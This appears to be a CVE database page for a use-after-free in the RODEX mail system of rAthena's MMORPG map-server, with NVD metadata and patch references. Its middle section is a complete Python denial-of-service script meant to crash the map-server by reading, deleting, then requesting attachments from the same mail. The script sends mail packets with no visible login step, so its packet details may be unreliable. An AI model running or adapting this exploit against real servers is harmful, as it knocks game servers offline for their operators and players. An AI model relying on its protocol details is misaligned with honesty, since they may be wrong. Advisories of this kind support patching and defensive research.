Security Vulnerability Report
CVE-2025-62170 CVSS 7.5 HIGH

CVE-2025-62170

Published: 2025-10-13 18:15:35
Last Modified: 2025-10-20 17:25:25

Description

rAthena is an open-source cross-platform MMORPG server. A use-after-free vulnerability exists in the RODEX functionality of rAthena's map-server in versions prior to commit af2f3ba. An unauthenticated attacker can exploit this vulnerability via a specific attacking scenario to cause a denial of service by crashing the map-server. This issue has been patched in commit af2f3ba. There are no known workarounds aside from manually applying the patch.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:rathena:rathena:*:*:*:*:*:*:*:* - VULNERABLE
rAthena < commit af2f3ba

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62170 - rAthena RODEX Use-After-Free PoC
# This PoC demonstrates the attack scenario targeting the RODEX mail system
# in rAthena map-server versions prior to commit af2f3ba.
# WARNING: For authorized security testing only.

import socket
import struct
import time

# rAthena map-server default port
MAP_SERVER_PORT = 5121
TARGET_HOST = "127.0.0.1"


def build_rodex_packet(packet_id, data=b""):
    """Build a basic rAthena map-server packet structure."""
    # Packet header: 2-byte packet ID + 2-byte payload length
    header = struct.pack("<HH", packet_id, len(data))
    return header + data


def build_rodex_open_mailbox():
    """Build a RODEX mailbox open request packet (CZ_REQ_OPEN_RODEXBOX)."""
    # Packet ID for opening RODEX mailbox
    return build_rodex_packet(0x09F1)


def build_rodex_read_mail(mail_id):
    """Build a RODEX mail read request (CZ_REQ_READ_RODEX)."""
    # Trigger read on a specific mail to load mail data into memory
    data = struct.pack("<I", mail_id)
    return build_rodex_packet(0x09F2, data)


def build_rodex_delete_mail(mail_id):
    """Build a RODEX mail delete request (CZ_REQ_DELETE_RODEX)."""
    # Delete the mail, freeing its memory
    data = struct.pack("<I", mail_id)
    return build_rodex_packet(0x0AAB, data)


def build_rodex_request_attachments(mail_id):
    """Build a RODEX attachment request (CZ_REQ_GET_RODEX_ITEM)."""
    # Request attachment from an already-deleted mail -> UAF trigger
    data = struct.pack("<I", mail_id)
    return build_rodex_packet(0x0AAF, data)


def exploit_rodex_uaf(target_host, target_port):
    """
    Exploit the use-after-free vulnerability in rAthena's RODEX functionality.

    Attack chain:
    1. Connect to the map-server
    2. Open the RODEX mailbox
    3. Read a specific mail (loads mail object into memory)
    4. Delete the same mail (frees the mail object memory)
    5. Request attachments from the deleted mail (triggers UAF -> crash)
    """
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_host, target_port))
        print(f"[+] Connected to {target_host}:{target_port}")

        # Step 1: Open RODEX mailbox
        sock.send(build_rodex_open_mailbox())
        time.sleep(0.5)
        print("[+] Step 1: RODEX mailbox opened")

        # Step 2: Read mail ID 1 (allocate mail object in memory)
        sock.send(build_rodex_read_mail(1))
        time.sleep(0.5)
        print("[+] Step 2: Mail ID 1 read into memory")

        # Step 3: Delete mail ID 1 (free the mail object)
        sock.send(build_rodex_delete_mail(1))
        time.sleep(0.5)
        print("[+] Step 3: Mail ID 1 deleted (memory freed)")

        # Step 4: Request attachments from deleted mail (trigger UAF)
        sock.send(build_rodex_request_attachments(1))
        time.sleep(0.5)
        print("[+] Step 4: Attachment request sent on freed mail -> UAF triggered")

        sock.close()
        print("[+] Exploit completed. Target map-server should crash.")
    except ConnectionRefusedError:
        print("[-] Connection refused. Ensure map-server is running.")
    except socket.timeout:
        print("[-] Connection timed out.")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    exploit_rodex_uaf(TARGET_HOST, MAP_SERVER_PORT)

References

https://github.com/rathena/rathena/commit/af2f3ba33fc03dc6dd510f8cfe84cd9185af748d (Patch)
https://github.com/rathena/rathena/security/advisories/GHSA-9mj9-8vgv-r92j (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-62170",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-13T18:15:34.980",
    "lastModified": "2025-10-20T17:25:25.287",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "rAthena is an open-source cross-platform MMORPG server. A use-after-free vulnerability exists in the RODEX functionality of rAthena's map-server in versions prior to commit af2f3ba. An unauthenticated attacker can exploit this vulnerability via a specific attacking scenario to cause a denial of service by crashing the map-server. This issue has been patched in commit af2f3ba. There are no known workarounds aside from manually applying the patch."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-416"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:rathena:rathena:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2025-10-12",
                "matchCriteriaId": "EE156285-7E1C-46E1-A2CA-562FB8A9D664"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/rathena/rathena/commit/af2f3ba33fc03dc6dd510f8cfe84cd9185af748d",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/rathena/rathena/security/advisories/GHSA-9mj9-8vgv-r92j",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}